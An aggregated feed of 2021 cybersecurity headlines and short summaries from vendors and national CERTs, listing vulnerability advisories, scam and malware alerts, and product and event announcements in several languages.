At Akamai, our mission is to make application and API security highly effective and easy. As part of that effort, we are excited to announce the Adaptive Security Engine -- a new core technology powering Akamai's application and API protection offerings, designed to enable a hands-off approach to protecting web applications and APIs with the highest degree of confidence.

https://www.akamai.com/blog/security/the-adaptive-security-engine-a-quantum-leap-forward-for-application
FIRST releases its 2020-21 Annual Report
2021-06-14T00:00:00Z | 1623628800

FIRST published its fifth Annual Report which covers the organization’s accomplishments towards its vision of bringing together incident response and security teams from every country across the world to ensure a safe internet for all. The report is available at FIRST Annual Report 2020-2021.

https://www.first.org/newsroom/releases/20210611
SonicOS vulnerability involving improper neutralization of HTTP header resulting in unauthenticated Denial of Service (DoS)
2021-06-13T18:58:20Z | 1623610700

A buffer overflow vulnerability in SonicOS allows a remote attacker to cause a Denial of Service (DoS) by sending a specially crafted request. This vulnerability affects SonicOS Gen5, Gen6, Gen7 platforms, and SonicOSv virtual firewalls.• SonicWall PSIRT is not aware of any active exploitation of this vulnerability in the wild• No reports of a PoC have been made public at the time of this advisory CVE: CVE-2021-20027 Last updated: June 16, 2021, 6:58 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0016
Ransomware: Attackers, Defenders, and FBI’s Perspective Cybersecurity Master Class: Episode 2
2021-06-13T12:01:23Z | 1623585683

The post Ransomware: Attackers, Defenders, and FBI’s Perspective Cybersecurity Master Class: Episode 2 appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-73
High Threat Security Alert (A21-06-05): Multiple vulnerabilities in Google Chrome
2021-06-11T04:00:00Z | 1623384000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2021-23393
2021-06-10T00:00:00Z | 1623283200

CWE-601: URL REDIRECTION TO UNTRUSED SITEA web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. Read more: "Exploiting URL Parsing Confusion"

https://claroty.com/team82/disclosure-dashboard/cve-2021-23393
Eliminating Data Races in Firefox – A Technical Report
2021-06-09T08:18:37Z | 1623226717

We successfully deployed ThreadSanitizer in the Firefox project to eliminate data races in our remaining C/C++ components. In the process, we found several impactful bugs and can safely say … Read more

https://blog.mozilla.org/attack-and-defense/2021/06/09/eliminating-data-races-in-firefox-a-technical-report/
High Threat Security Alert (A21-06-02): Multiple Vulnerabilities in Microsoft Products (June 2021)
2021-06-09T04:00:00Z | 1623211200

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-06-03) Multiple Vulnerabilities in Adobe Reader/Acrobat
2021-06-09T04:00:00Z | 1623211200

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-06-04): Multiple Vulnerabilities in Android
2021-06-09T04:00:00Z | 1623211200

Google has released Android Security Bulletin June 2021 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Komoot GmbH Komoot Friend finder information disclosure vulnerability
2021-06-09T00:00:00Z | 1623196800

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1288
Google Chrome WebAudio blink::AudioNodeOutput::Pull code execution vulnerability
2021-06-08T00:00:00Z | 1623110400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1251
Older persons particularly vulnerable to cyber criminals – total losses already €2.1 million
2021-06-07T12:18:11Z | 1623068291

Spring 2021 has been lucrative for cyber criminals in Finland. They have managed to steel online banking and credit card credentials and transfer large sums of money from their victims’ bank accounts. Criminals have targeted, in particular, persons aged 60 years and older. Total losses by all victims already amount to EUR 2.1 million. It is important to be very careful when using online banking services and accepting payments.

https://www.kyberturvallisuuskeskus.fi/en/news/older-persons-particularly-vulnerable-cyber-criminals-total-losses-already-eu21-million
Older persons particularly vulnerable to cyber criminals – total losses already €2.1 million
2021-06-07T12:18:11Z | 1623068291

Spring 2021 has been lucrative for cyber criminals in Finland. They have managed to steel online banking and credit card credentials and transfer large sums of money from their victims’ bank accounts. Criminals have targeted, in particular, persons aged 60 years and older. Total losses by all victims already amount to EUR 2.1 million. It is important to be very careful when using online banking services and accepting payments.

https://www.kyberturvallisuuskeskus.fi/en/news/older-persons-particularly-vulnerable-cyber-criminals-total-losses-already-eu21-million
What to Consider Before Renewing your SD-WAN Product or Service Contract
2021-06-07T11:52:17Z | 1623066737

The post What to Consider Before Renewing your SD-WAN Product or Service Contract appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-50
Trusting Locations Bites Us Yet Again
2021-06-07T04:00:00Z | 1623038400

Recently, Microsoft announced the discovery of yet another attack being launched by the now infamous Nobelium group, which has been responsible for numerous successful attacks, including the widespread SolarWinds breach in 2020.

https://www.akamai.com/blog/news/trusting-locations-bites-us-yet-again
Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 1
2021-06-07T00:00:00Z | 1623024000

Leveraging the HackSysExtreme Vulnerable Driver to understand the Windows kernel pool, the impacts of kLFH, and bypassing kASLR from low integrity via out-of-bounds read vulnerabilities.

/swimming-in-the-kernel-pool-part-1/
NCSC-FI has issued a severe alert on Android malware spread by SMS
2021-06-04T15:39:02Z | 1622821142

NCSC-FI has issued a severe alert on Android malware spread by SMS. The malware may steal, for example, passwords and other data from infected devices. Infected devices are also used to spread the malware further.

https://www.kyberturvallisuuskeskus.fi/en/Varoitus_TTN_0621
NCSC-FI has issued a severe alert on Android malware spread by SMS
2021-06-04T15:39:02Z | 1622821142

NCSC-FI has issued a severe alert on Android malware spread by SMS. The malware may steal, for example, passwords and other data from infected devices. Infected devices are also used to spread the malware further.

https://www.kyberturvallisuuskeskus.fi/en/Varoitus_TTN_0621
Android malware spread by SMS
2021-06-04T15:24:57Z | 1622820297

The FluBot campaign sending scam messages became active in Finland in June and is still causing trouble. Based on reports received by the National Cyber Security Center (NCSC-FI), scam messages written in Finnish are being sent to thousands of people in Finland. Earlier this summer, the message said there is a package in delivery and contained a link for tracking the delivery. The link tried to lure the recipient to a scam website and install the malicious FluBot software. In the new campaign, the messages use a voicemail theme. This alert was discontinued on 17 August 2021 after the situation settled.

https://www.kyberturvallisuuskeskus.fi/en/android-malware-spread-sms
How Network Segmentation Simplifies PCI DSS Compliance
2021-06-03T17:57:00Z | 1622743020

Read more about how proper network segmentation can simplify PCI DSS compliance by effectively reducing the number of assets in scope.

https://www.akamai.com/blog/security/pci-dss-network-segmentation
Island hakkab koos Eesti ja Soomega X-tee tarkvara arendama
2021-06-03T09:58:26Z | 1622714306

Island liitus 1. juunil Põhjamaade Koosvõimelahenduste Instituudiga (NIIS), mis arendab liikmetele digivalitsemise lahendusi, sh X-tee tarkvara (rahvusvahelise kaubamärgiga X-Road). Islandist sai asutajate Eesti ja Soome järel kolmas liige rahvusvahelises konsortsiumis.

https://ria.ee/uudised/island-hakkab-koos-eesti-ja-soomega-x-tee-tarkvara-arendama
Now Available: EdgeKV Distributed Key-Value Store
2021-06-03T04:00:00Z | 1622692800

We're excited to announce the availability of EdgeKV, a distributed key-value store database that enables EdgeWorkers to leverage data stored at the edge when deploying custom code across our serverless computing platform.

https://www.akamai.com/blog/news/now-available-edgekv-distributed-key-value-store
RIA pani kokku infoturbeaabitsa avalikule sektorile
2021-06-02T09:58:25Z | 1622627905

Riigi Infosüsteemi Amet (RIA) koos partneritega on uuendanud Eesti infoturbestandardit, mis koondab infoturbe ohud ning pakub avaliku sektori asutustele meetmeid, mille rakendamine aitab hoida süsteemid turvalisena.

https://ria.ee/uudised/ria-pani-kokku-infoturbeaabitsa-avalikule-sektorile
Your First 100 Days as CIO: 5 Steps to Success
2021-06-02T08:52:21Z | 1622623941

The post Your First 100 Days as CIO: 5 Steps to Success appeared first on Cato Networks.

https://www.catonetworks.com/resources/your-first-100-days-as-cio-5-steps-to-success/
Webkit ImageLoader dispatchPendingErrorEvent use-after-free vulnerability
2021-06-02T00:00:00Z | 1622592000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1229
Apple macOS SMB server TREE_CONNECT stack buffer overflow vulnerability
2021-06-02T00:00:00Z | 1622592000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1246
Apple macOS SMB server create file request uninitialized memory disclosure
2021-06-02T00:00:00Z | 1622592000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1268
Apple macOS SMB server directory query request integer overflow vulnerability
2021-06-02T00:00:00Z | 1622592000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1260
Apple macOS SMB server lock request infinite loop
2021-06-02T00:00:00Z | 1622592000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1263
Apple macOS SMB server directory query arbitrary file access
2021-06-02T00:00:00Z | 1622592000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1269
Apple macOS SMB server IOCTL request uninitialized stack variable vulnerability
2021-06-02T00:00:00Z | 1622592000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1258
Webkit WebCore::GraphicsContext use-after-free vulnerability
2021-06-02T00:00:00Z | 1622592000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1238
ICASI integrates into FIRST PSIRT SIG bolstering the incident response and security team industry
2021-06-01T13:00:00Z | 1622552400

ICASI – the Industry Consortium for Advancement of Security on the Internet was officially integrated into the Forum of Incident Response and Security Teams (FIRST) on May 28, 2021. Established in 2008, ICASI’s purpose was to strengthen the global security landscape by driving excellence and innovation in security response practices; facilitating collaboration among members to analyze, mitigate, and resolve multi-stakeholder, global security challenges. This role will continue but as part of the existing FIRST PSIRT SIG, expand and improve the community’s ability to respond to vulnerabilities across multiple vendors. Founded in 1990, FIRST is the global leader in incident response.

https://www.first.org/newsroom/releases/20210601
ICASI integrates into FIRST PSIRT SIG bolstering the incident response and security team industry
2021-06-01T13:00:00Z | 1622552400

ICASI – the Industry Consortium for Advancement of Security on the Internet was officially integrated into the Forum of Incident Response and Security Teams (FIRST) on May 28, 2021. Established in 2008, ICASI’s purpose was to strengthen the global security landscape by driving excellence and innovation in security response practices; facilitating collaboration among members to analyze, mitigate, and resolve multi-stakeholder, global security challenges. This role will continue but as part of the existing FIRST PSIRT SIG, expand and improve the community’s ability to respond to vulnerabilities across multiple vendors. Founded in 1990, FIRST is the global leader in incident response.

https://www.first.org/newsroom/releases/20210601
Poor VPN Scalability Hurts Productivity and Security
2021-06-01T06:46:55Z | 1622530015

Due to the surge in remote work inspired by COVID-19, VPN infrastructure designed to support 10-20% of the workforce has failed to keep up. This has inspired companies to invest in scaling their VPN infrastructure, but this is not as easy as it sounds. VPNs are difficult to scale for a few different reasons, and... The post Poor VPN Scalability Hurts Productivity and Security appeared first on Cato Networks.

https://www.catonetworks.com/blog/poor-vpn-scalability-hurts-productivity-and-security/
Security Alert (A21-06-01): Multiple vulnerabilities in Firefox
2021-06-01T04:00:00Z | 1622520000

Mozilla has published the advisories (MFSA 2021-23 and MFSA 2021-24) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai EAA Impersonation Vulnerability - A Deep Dive
2021-06-01T04:00:00Z | 1622520000

In this post, we cover the technical details of CVE-2021-28091, the vulnerability impacting Akamai's Enterprise Application Access (EAA) platform.

https://www.akamai.com/blog/news/akamai-eaa-impersonation-vulnerability-a-deep-dive
SAML Implementation Vulnerability Impacting Some Akamai Services
2021-06-01T04:00:00Z | 1622520000

This blog post provides an overview of a vulnerability discovered in Akamai's Enterprise Application Access (EAA) product which has been patched.

https://www.akamai.com/blog/news/saml-implementation-vulnerability-impacting-some-akamai-services
SOGo and PacketFence Impacted by SAML Implementation Vulnerabilities
2021-06-01T04:00:00Z | 1622520000

Part of Akamai's incident management process for vulnerabilities in third party software involves verifying potential impact in other systems using the same or similar libraries.

https://www.akamai.com/blog/news/sogo-and-packetfence-impacted-by-saml-implementation-vulnerabilities
The Rapid Resurgence of DDoS Extortion (That Didn't Take Long)
2021-06-01T04:00:00Z | 1622520000

Just when we thought DDoS extortion was fading into the rearview mirror, it's time to circle up the trucks again (gas tanks full).

https://www.akamai.com/blog/news/the-rapid-resurgence-of-ddos-extortion-that-didnt-take-long
How Enigmo Moved Logic from Client to Origin to Edge
2021-06-01T04:00:00Z | 1622520000

Enigmo owns BUYMA, a Japanese fashion C2C marketplace that helps people buy and sell high-quality goods from overseas on www.buyma.com.

https://www.akamai.com/blog/edge/how-enigmo-moved-logic-from-client-to-origin-to-edge
Accusoft ImageGear JPG sof_nb_comp header processing out-of-bounds write vulnerability
2021-06-01T00:00:00Z | 1622505600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1257
Accusoft ImageGear TIF bits_per_sample processing out-of-bounds write vulnerability
2021-06-01T00:00:00Z | 1622505600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1261
Accusoft ImageGear PDF process_fontname stack-based buffer overflow vulnerability
2021-06-01T00:00:00Z | 1622505600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1286
Accusoft ImageGear JPG Handle_JPEG420 out-of-bounds write vulnerability
2021-06-01T00:00:00Z | 1622505600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1289
Accusoft ImageGear TIF IP_planar_raster_unpack improper array index validation vulnerability
2021-06-01T00:00:00Z | 1622505600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1296
Accusoft ImageGear DICOM parse_dicom_meta_info integer overflow vulnerability
2021-06-01T00:00:00Z | 1622505600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1275
Accusoft ImageGear PNG png_palette_process memory corruption vulnerability
2021-06-01T00:00:00Z | 1622505600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1276
IntelMQ release 2.3.3 with support for new Shadowserver feeds
2021-05-31T19:39:28Z | 1622489968

While the development of the next major version 3.0.0 of IntelMQ is in the final spurt, we released a small maintenance version of IntelMQ: version 2.3.3. It marks the end of the 2.x development cycle and is an important milestone of our project “Enhancing Cybersecurity in Austria” (2018-AT-IA-0111). Beside small error corrections it comes with support for a few new feeds provided by the Shadowserver foundation. Several feeds have been re-organized, renamed and split for better clarity. The Shadowserver parser documentation contains a list of all feeds supported by IntelMQ. A detailed list of all changes can be read in the release notes, the full documentation can be found at intelmq.readthedocs.io. This blog post is part of a series of blog posts related to our CEF Telecom 2018-AT-IA-0111 project, which also supports our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2021/5/intelmq-release-233-with-support-for-new-shadowserver-feeds
RTK: Riigi Infosüsteemi Ameti eurotoetusi saab 1. juunist taotleda Riigi Tugiteenuste Keskusest
2021-05-31T10:59:01Z | 1622458741

Riigi Infosüsteemi Amet annab 1. juunil Riigi Tugiteenuste Keskusele (RTK) üle toetusteenuste ülesanded. See tähendab, et infoühiskonna edendamiseks mõeldud eurotoetusi saab nüüdsest taotleda RTK kaudu.

https://ria.ee/uudised/rtk-riigi-infosusteemi-ameti-eurotoetusi-saab-1-juunist-taotleda-riigi-tugiteenuste
Publicado o Boletim 2/2021 do Observatório de Cibersegurança
2021-05-31T00:00:00Z | 1622419200

O segundo Boletim de 2021 do Observatório de Cibersegurança é dedicado ao caso das vulnerabilidades no Microsoft Exchange descobertas no início de 2021, explicando não só o contexto, mas também a atuação do CNCS desde então. Neste sentido, o documento em causa reflete sobre a importância de existir uma política de divulgação responsável de vulnerabilidades. Como já é habitual, este Boletim é também uma oportunidade para encontrar documentos e notícias considerados úteis neste domínio.Pode aceder ao documento na íntegra aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135529/publicado-o-boletim-22021-do-observatorio-de-ciberseguranca
SonicWall 802.11 Frame Aggregation and Fragmentation Vulnerabilities (FragAttacks)
2021-05-28T19:03:49Z | 1622228629

Vulnerabilities in IEEE 802.11 implementation were found. These vulnerabilities could allow an attacker to inject malicious frames into legitimate WiFi traffic. The discovered vulnerabilities affect all modern security protocols of WiFi, including the latest WPA3. Successful exploitation of these vulnerabilities can result in the extraction of sensitive data and the manipulation of WiFi traffic. In order for an attacker to exploit these vulnerabilities he needs to be in proximity of the WiFi network and trick a user connected to the WiFi network to visit the attacker’s server. CVE: CVE-2020-24586, CVE-2020-24587, CVE-2020-24588, CVE-2020-26140, CVE-2020-26143, CVE-2020-26146, CVE-2020-26147 Last updated: Jan. 21, 2022, 7:08 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0015
5 Benefits of Network Segmentation
2021-05-28T15:14:00Z | 1622214840

Learn more about how microsegmentation can enable you to achieve granular network segmentation, quickly and securely.

https://www.akamai.com/blog/security/network-segmentation-benefits
Hold on to your money – older persons are an attractive target for cyber criminals
2021-05-28T11:35:54Z | 1622201754

Different scams are here to stay, and older persons in particular are at risk of becoming victims to cyber criminals. However, there is a lot we can and should do to turn this trend around.

https://www.kyberturvallisuuskeskus.fi/en/news/hold-your-money-older-persons-are-attractive-target-cyber-criminals
Hold on to your money – older persons are an attractive target for cyber criminals
2021-05-28T11:35:54Z | 1622201754

Different scams are here to stay, and older persons in particular are at risk of becoming victims to cyber criminals. However, there is a lot we can and should do to turn this trend around.

https://www.kyberturvallisuuskeskus.fi/en/news/hold-your-money-older-persons-are-attractive-target-cyber-criminals
Administrative Court clarifies the interpretation of cookie rules
2021-05-28T11:33:23Z | 1622201603

The Helsinki Administrative Court ruled in April on two of our decisions concerning cookies that websites store on terminal devices and giving consent to the use of non-essential cookies. The Administrative Court decisions clarify the interpretation of legislation. We will revise our guidance on cookies and other data stored on users’ devices.

https://www.kyberturvallisuuskeskus.fi/en/news/administrative-court-clarifies-interpretation-cookie-rules
Administrative Court clarifies the interpretation of cookie rules
2021-05-28T11:33:23Z | 1622201603

The Helsinki Administrative Court ruled in April on two of our decisions concerning cookies that websites store on terminal devices and giving consent to the use of non-essential cookies. The Administrative Court decisions clarify the interpretation of legislation. We will revise our guidance on cookies and other data stored on users’ devices.

https://www.kyberturvallisuuskeskus.fi/en/news/administrative-court-clarifies-interpretation-cookie-rules
Information security skills – what a nightmare!
2021-05-28T11:32:17Z | 1622201537

Cyber security, information security, firewall, antivirus software, secure connection. Need to catch your breath? Don’t worry, it all boils down to your safety and common sense.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-skills-what-nightmare
Information security skills – what a nightmare!
2021-05-28T11:32:17Z | 1622201537

Cyber security, information security, firewall, antivirus software, secure connection. Need to catch your breath? Don’t worry, it all boils down to your safety and common sense.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-skills-what-nightmare
Linux Kernel Arm SIGPAGE information disclosure vulnerability
2021-05-28T00:00:00Z | 1622160000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1243
É já no próximo dia 1 de junho que será lançada a segunda edição do curso Cidadão Ciberinformado
2021-05-28T00:00:00Z | 1622160000

Nesta edição os participantes terão acesso ao Módulo 5 que ensina a analisar uma notícia e convida os inscritos a responderem a um inquérito. O objetivo do inquérito em causa passa por investigar qual a perceção dos cidadãos sobre a credibilidade dos conteúdos noticiosos em português. Ou seja, os formandos terão oportunidade de participar, de certa forma, na construção de uma ferramenta que a Lusa e o Inesc-Id estão a desenvolver, atribuindo 'rótulos nutricionais' à informação, ajudando assim os cidadãos no combate à desinformação.Desta forma, o protótipo em causa disponibiliza a "informação nutricional" da notícia, considerando todo o seu conteúdo. Especificando informação relevante na sua composição, desde a credibilidade das fontes, a origem ou a carga emocional, subjetividade, ou através da identificação de uma polaridade marcadamente positiva ou negativa.Recorde-se que o curso do Cidadão Ciberinformado visa, não só estimular o espírito crítico do leitor de informação, mas também dotar os portugueses de recursos que permitam identificar o que é informação rigorosa e o que pode ser material de desinformação.Neste sentido, o Módulo em causa coloca o formando no papel de verificador, cedendo para isso ferramentas práticas para este consiga fazer a distinção dos conteúdos noticiosos.Recorde-se que o curso "Cidadão Ciberinformado" tem uma duração total de 4 horas e estará disponível ao longo de três meses, entre 1 de junho e 31 de agosto 2021. Contudo, os interessados já podem garantir a sua inscrição aqui .No final, os participantes que responderem às atividades com 75% das respostas corretas podem descarregar um Certificado de conclusão.

https://dyn.cncs.gov.pt/pt/detalhe/art/135542/e-ja-no-proximo-dia-1-de-junho-que-sera-lancada-a-segunda-edicao-do-curso-cidadao-ciberinformado
CVE-2020-15782
2021-05-28T00:00:00Z | 1622160000

CWE-119: IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER: The software performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer.Read more: ""The Race to Native Code Execution in PLCs"

https://claroty.com/team82/disclosure-dashboard/cve-2020-15782
SonicWall NSM On-Prem authenticated command injection vulnerability
2021-05-27T14:07:54Z | 1622124474

A vulnerability in the SonicWall NSM On-Prem product allows an authenticated attacker to perform OS command injection using a crafted HTTP request. This vulnerability affects NSM On-Prem 2.2.0-R10 and earlier versions. CVE: CVE-2021-20026 Last updated: May 27, 2021, 2:07 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0014
Edge DNS Secondary Implementation: Order of Operations for NS Zone and Registrar Records
2021-05-27T04:00:00Z | 1622088000

Akamai Edge DNS service delivers edge-based, authoritative domain services for thousands of organizations.

https://www.akamai.com/blog/edge/edge-dns-secondary-implementation-order-of-operations-for-ns-zone
Information security requirements for smart devices: are companies ready?
2021-05-26T08:10:29Z | 1622016629

The information security of smart devices raises questions among device manufacturers, retailers and consumers alike. At the end of 2019, Finland introduced the Cybersecurity Label, a voluntary label awarded to secure smart devices. Voluntary and mandatory requirements for smart devices are currently also discussed at EU level.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-requirements-smart-devices-are-companies-ready
Information security requirements for smart devices: are companies ready?
2021-05-26T08:10:29Z | 1622016629

The information security of smart devices raises questions among device manufacturers, retailers and consumers alike. At the end of 2019, Finland introduced the Cybersecurity Label, a voluntary label awarded to secure smart devices. Voluntary and mandatory requirements for smart devices are currently also discussed at EU level.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-requirements-smart-devices-are-companies-ready
Security Alert (A21-05-12): Vulnerability in Pulse Secure Products
2021-05-26T04:00:00Z | 1622001600

Pulse Secure has released a security advisory about a buffer overflow vulnerability in Pulse Connect Secure gateway.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-05-13): Multiple vulnerabilities in Google Chrome
2021-05-26T04:00:00Z | 1622001600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-05-14): Multiple Vulnerabilities in VMware Products
2021-05-26T04:00:00Z | 1622001600

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
ThinkPHP Exploit Actively Exploited in the Wild
2021-05-26T04:00:00Z | 1622001600

https://www.akamai.com/blog/security/thinkphp-exploit-actively-exploited-in-the-wild
New Cato Networks SASE Report Identifies Age-Old Threats Lurking on Enterprise Networks
2021-05-25T12:06:43Z | 1621944403

The recent attack on the Colonial Pipeline. Russian and Chinese election meddling. The exotic and spectacular threats grab popular headlines, but it’s the everyday challenges that plague enterprise networks. Unpatched legacy systems, software long exploited by attackers, banned consumer applications, and more leave enterprises exposed to attack.   SASE Platform Gathers Networking and Security Information  Those were just some of the key findings emerging from our analysis of 850 enterprise networks in the Cato Networks SASE Threat Research Report. From January... The post New Cato Networks SASE Report Identifies Age-Old Threats Lurking on Enterprise Networks appeared first on Cato Networks.

https://www.catonetworks.com/blog/new-cato-networks-sase-report-identifies-age-old-threats-lurking-on-enterprise-networks/
Why a Backbone Is More Than Just a Bunch of PoPs
2021-05-25T06:23:12Z | 1621923792

Since SASE’s introduction, many networking and security vendors have rushed to capitalize on the market by partnering with other providers to include cloud backbones as part of their SASE offerings. But SASE isn’t just a bunch of features in appliances managed from the cloud. It’s about building a true cloud service, one that delivers optimal,... The post Why a Backbone Is More Than Just a Bunch of PoPs appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-a-backbone-is-more-than-just-a-bunch-of-pops/
Security Alert (A21-05-10): Multiple Vulnerabilities in Apple iOS and iPadOS
2021-05-25T04:00:00Z | 1621915200

Apple has released iOS 14.6 and iPadOS 14.6 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-05-11): Multiple Vulnerabilities in Bluetooth devices
2021-05-25T04:00:00Z | 1621915200

Multiple vulnerabilities are found in Bluetooth devices that support the Bluetooth Core and Mesh Specifications.

https://www.govcert.gov.hk/en/alerts_detail.php
It's Official - Akamai is a Great Place to Work
2021-05-25T04:00:00Z | 1621915200

When Akamai Costa Rica won the 'Great Place to Work' award, we were delighted. It's a wonderful achievement that really means a lot to Akamai and to all the collaborators who have worked here. It highlights the great working environment that Akamai have created for us. But it also shines a light on all the contributions made by our collaborators over the years.

https://www.akamai.com/blog/culture/its-official-we-are-a-great-place-to-work-andres-gonzalez
How (and Why) to Apply OSINT to Protect your Enterprise
2021-05-24T06:35:59Z | 1621838159

The post How (and Why) to Apply OSINT to Protect your Enterprise appeared first on Cato Networks.

https://catonetworks.easywebinar.live/event-registration-58
Romanian Crypto Mining Infection
2021-05-24T04:00:00Z | 1621828800

While examining my honeypot logs and digging through the newly downloaded binaries last week, I noticed a large compressed file. I figured it would be a crypto miner, typically a tar archive and gzip (normally erroneously) compressed. I moved the archive over to my test lab and started examining the contents.

https://www.akamai.com/blog/security/romanian-crypto-mining-infection
Trend Micro Inc. Home Network Security SFTP log collection server hard-coded password vulnerability
2021-05-24T00:00:00Z | 1621814400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1241
Trend Micro Inc. Home Network Security tdts.ko chrdev_ioctl_handle privilege escalation vulnerability
2021-05-24T00:00:00Z | 1621814400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1231
Trend Micro, Inc. Home Network Security tdts.ko chrdev_ioctl_handle privilege escalation vulnerability
2021-05-24T00:00:00Z | 1621814400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1230
How Gartner’s SASE will Transform the Network in 2021
2021-05-23T09:39:25Z | 1621762765

The post How Gartner’s SASE will Transform the Network in 2021 appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-61
NCSC statement on the SolarWinds compromise
2021-05-21T14:12:53Z | 1621606373

The latest statement from the NCSC following the reported SolarWinds compromise.

https://www.ncsc.gov.uk/news/ncsc-statement-on-solarwinds-compromise
Why FIDO2 is the Answer to Better Security
2021-05-21T04:00:00Z | 1621569600

A groundbreaking increase in security incidents is affecting governments around the world. In light of this, the United States issued a formal order to implement a robust set of security measures designed to improve the security of federal systems. In his most recent executive order, President Biden acknowledged that the United States and many other governments around the world are facing increasing malicious cyberattacks. In order to prevent, and recover from security incidents, the President is pushing to significantly improve the government's security stack, including the implementation of multi-factor authentication (MFA). In this post, I'll discuss how the government's plan to leverage MFA could be even better.

https://www.akamai.com/blog/security/why-fido2-is-the-answer-to-better-security-
Why FIDO2 Is the Answer to Better Security
2021-05-21T04:00:00Z | 1621569600

A groundbreaking increase in security incidents is affecting governments around the world. In light of this, the United States issued a formal order to implement a robust set of security measures designed to improve the security of federal systems.

https://www.akamai.com/blog/news/why-fido2-is-the-answer-to-better-security
Digital Transformation Usain Bolt-Style: Health Care's Sprint to Modernization
2021-05-21T04:00:00Z | 1621569600

In the present age, patients now use smartphone apps to schedule doctor's visits, contact insurance companies, and get prescriptions instead of picking up the phone.

https://www.akamai.com/blog/cloud/digital-transformation-usain-bolt-style-health-cares-sprint-to-modernization
How Does Ransomware Actually Spread?
2021-05-20T16:24:00Z | 1621527840

We all know the damage ransomware can do - but how does ransomware actually spread? Our blog shows you how - and how it can be stopped.

https://www.akamai.com/blog/security/how-ransomware-actually-spreads
Browser fuzzing at Mozilla
2021-05-20T16:11:03Z | 1621527063

Introduction Mozilla has been fuzzing Firefox and its underlying components for a while. It has proven to be one of the most efficient ways to identify quality and security … Read more

https://blog.mozilla.org/attack-and-defense/2021/05/20/browser-fuzzing-at-mozilla/
Cyber weather in April: rain and sunny spells
2021-05-19T11:06:20Z | 1621422380

Cyber weather in April was typically rainy. Scammers were as active as ever. Some rays of sunshine were seen as the number of reported Office 365 data breaches decreased and the Administrative Court clarified the interpretation of cookie rules.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa-huhtikuu-2021
Cyber weather in April: rain and sunny spells
2021-05-19T11:06:20Z | 1621422380

Cyber weather in April was typically rainy. Scammers were as active as ever. Some rays of sunshine were seen as the number of reported Office 365 data breaches decreased and the Administrative Court clarified the interpretation of cookie rules.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa-huhtikuu-2021
Kevadtormi osana korraldab RIA koos Elisa, Tele2 ja Teliaga küberõppuse
2021-05-19T07:13:28Z | 1621408408

Digilahendustest tulvil Eesti julgeolek sõltub iga päev üha rohkem küberturvalisusest. Sestap korraldab RIA ühes partneritega täna Eesti telekommunikatsiooni ettevõtetele õppuse Kübertorm, mis mängib kokku Kaitseväe suurõppuse Kevadtormiga.

https://ria.ee/uudised/kevadtormi-osana-korraldab-ria-koos-elisa-tele2-ja-teliaga-kuberoppuse
XITE Music Video Platform Amplifies Entertainment with Akamai's Help
2021-05-19T04:00:00Z | 1621396800

With so many people around the globe seeking socially distanced fun and solace, at-home entertainment has never been more important. XITE aims to offer the best music video experience in the world. Akamai is delighted that this exciting, interactive video platform chose to work with us to provide high-quality, secure online video, which enables XITE to deliver on the experience its fans have come to love.

https://www.akamai.com/blog/performance/xite-music-video-platform-amplifies-entertainment-with-akamais-help
Apple macOS SMB server signature verification information disclosure vulnerability
2021-05-19T00:00:00Z | 1621382400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1237
Google Chrome AudioDelayDSPKernel::ProcessKRate heap-based buffer overflow vulnerability
